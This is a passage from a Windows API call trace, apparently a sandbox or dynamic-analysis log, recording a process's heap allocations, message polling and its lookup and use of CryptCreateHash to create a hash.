lpMsg=0x8cef58) returned 0 [0226.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0226.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0226.661] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0226.661] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0226.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0226.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0226.661] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0226.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0226.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0226.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0226.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0226.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0226.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0226.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51580, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0226.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0226.661] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0226.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0226.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0226.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0226.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0226.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0226.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0226.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0226.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0226.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0226.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0226.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0226.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0226.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0226.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0226.662] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0226.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0226.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0226.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0226.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0226.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0226.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0226.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0226.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0226.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0226.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0226.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0226.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0226.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0226.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0226.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0226.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0226.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0226.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0226.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0226.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0226.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0226.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0226.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0226.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0226.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0226.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0226.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0226.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0226.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0226.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0226.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0226.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0226.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0226.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0226.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0226.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0226.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0226.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0226.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0226.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0226.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0226.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0226.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0226.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0226.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0226.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0226.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0226.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0226.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0226.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0226.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0226.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0226.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0226.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0226.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0226.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0226.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0226.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0226.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0226.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0226.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0226.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0226.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0226.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0226.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0226.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0226.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0226.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0226.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0226.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0226.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0226.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0226.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0226.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0226.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0226.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0226.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0226.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0226.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0226.665] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0226.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0226.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0226.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0226.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0226.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0226.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0226.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0226.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0226.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0226.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0226.665] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0226.665] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0226.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0226.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0226.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0226.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0226.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0226.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0226.666] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0226.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0226.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0226.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0226.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0226.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0226.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0226.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0226.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0226.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0226.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0226.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0226.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550f8 [0226.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0226.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0226.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0226.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0226.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0226.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0226.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0226.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0226.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0226.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0226.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0226.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0226.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0226.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0226.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0226.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0226.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0226.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0226.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0226.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0226.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0226.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0226.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0226.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0226.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0226.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0226.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0226.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0226.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0226.667] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0226.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0226.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0226.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0226.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0226.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0226.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0226.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0226.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0226.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0226.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0226.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0226.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0226.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0226.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0226.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0226.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54fd8 [0226.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0226.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0226.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0226.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0226.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0226.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0226.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0226.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0226.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0226.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0226.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0226.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c28 [0226.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0226.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0226.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0226.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0226.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0226.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0226.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0226.669] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0226.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0226.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0226.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0226.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0226.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0226.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0226.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0226.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0226.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0226.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0226.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0226.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0226.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0226.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0226.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f98 [0226.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0226.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0226.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0226.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0226.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54fe8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0226.670] HeapFree (in: hHeap=0x970000, 